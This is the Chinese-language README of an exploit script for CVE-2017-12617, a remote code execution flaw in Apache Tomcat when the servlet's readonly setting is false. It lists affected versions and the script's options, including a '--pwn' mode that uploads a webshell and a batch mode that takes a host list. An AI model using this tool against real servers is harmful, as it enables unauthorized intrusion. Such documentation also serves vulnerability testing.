CVE-2017-12617 在 Apache Tomcat 中发现的严重远程代码执行(RCE)漏洞
受影响的是通过将 Default servlet 的 "read-only" 初始化参数设置为 "false" 而启用 HTTP PUT 的系统。
Tomcat 9.0.1 (Beta)、8.5.23、8.0.47 和 7.0.82 之前的版本包含一个潜在危险的
远程代码执行(RCE)漏洞,影响所有操作系统,如果 default servlet 配置为
将 readonly 参数设置为 false,或者启用 WebDAV servlet 并将
readonly 参数设置为 false
./cve-2017-12617.py [options]
选项:
-u ,--url [::] 检查目标 URL 是否存在漏洞
-p,--pwn [::] 生成 webshell 并上传它
-l,--list [::] 主机列表
[+]用法:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt